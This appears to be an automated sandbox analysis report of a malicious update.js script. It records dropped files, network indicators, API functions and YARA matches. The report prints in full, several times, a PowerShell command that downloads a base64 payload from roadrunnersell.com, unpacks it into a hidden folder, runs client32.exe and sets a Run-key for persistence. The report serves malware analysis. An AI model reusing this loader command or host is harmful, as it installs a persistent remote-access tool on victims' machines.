                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://momentjs.com/
                                Source: wscript.exe, 00000000.00000003.1353432566.000002BB08E4D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/
                                Source: wscript.exe, 00000000.00000003.1356140379.000002BB7E3D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/9
                                Source: wscript.exe, 00000000.00000003.1406668213.000002BB03B76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1377935458.000002BB09451000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/trade/d.php?5517
                                Source: wscript.exeString found in binary or memory: https://roadrunnersell.com/trade/fix.php?532
                                Source: wscript.exe, 00000009.00000003.2124586436.000002B2CDE34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://roadrunnersell.com/trade/fix.php?532d
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com
                                Source: wscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.com(d
                                Source: wscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.comHlY
                                Source: wscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www-googleapis-staging.sandbox.google.comX
                                Source: wscript.exe, 00000000.00000003.1234026826.000002BB03AB1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1367815908.000002BB0934F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492692788.000002BB03AD5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1419923881.000002BB039EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1425244635.000002B2D3321000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
                                Source: wscript.exe, 00000000.00000003.1168777845.000002BB01758000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1175488459.000002BB024B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1171796710.000002BB00343000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357625145.000002BB091D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396552350.000002BB06742000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.1439411024.000002B2CFE05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com
                                Source: wscript.exe, 00000000.00000003.1237831355.000002BB00596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.comW
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49704 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49705 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49709 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 79.141.163.131:443 -> 192.168.2.16:49710 version: TLS 1.2
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,13_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110335A0 GetClipboardFormatNameA,SetClipboardData,13_2_110335A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101FC20 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,13_2_1101FC20
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11033320 IsClipboardFormatAvailable,GetClipboardData,GetClipboardFormatNameA,GetLastError,GlobalUnlock,13_2_11033320
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,13_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,13_2_11114590
                                Source: Yara matchFile source: 13.2.client32.exe.111b8c68.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,13_2_111165C0

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: amsi64_3528.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: sslproxydump.pcap, type: PCAPMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 3528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Powershell drops PE file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dllJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                                Wscript starts Powershell (via cmd or directly)
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11113190: GetKeyState,DeviceIoControl,keybd_event,13_2_11113190
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,13_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102DD21
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D250010_2_00007FFEC86D2500
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D18D510_2_00007FFEC86D18D5
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D221210_2_00007FFEC86D2212
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC86D9E5310_2_00007FFEC86D9E53
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFEC8C7704A10_2_00007FFEC8C7704A
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1107368013_2_11073680
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11029BB013_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110627B013_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_110336D013_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1105180013_2_11051800
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1115F84013_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1102BD4013_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101BCD013_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11087F5013_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11045E7013_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1101C11013_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111640E013_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1116834513_2_11168345
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_111265B013_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1107043013_2_11070430
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1108074013_2_11080740
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1100892B13_2_1100892B
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11161299 appears 36 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11027F40 appears 47 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11164ED0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11147060 appears 545 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 1105E820 appears 271 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11081E70 appears 46 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 11029A70 appears 888 times
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: String function: 1116FED0 appears 35 times
                                Source: update.jsInitial sample: Strings found which are bigger than 50
                                Source: amsi64_3528.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 3528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@8/29@2/3
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1105A760 GetLastError,FormatMessageA,LocalFree,13_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,13_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,13_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,13_2_11116880
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11089430 FindResourceA,LoadResource,LockResource,13_2_11089430
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeCode function: 13_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,13_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\HHIAHYOW-5Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngciucte.i2j.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe "C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
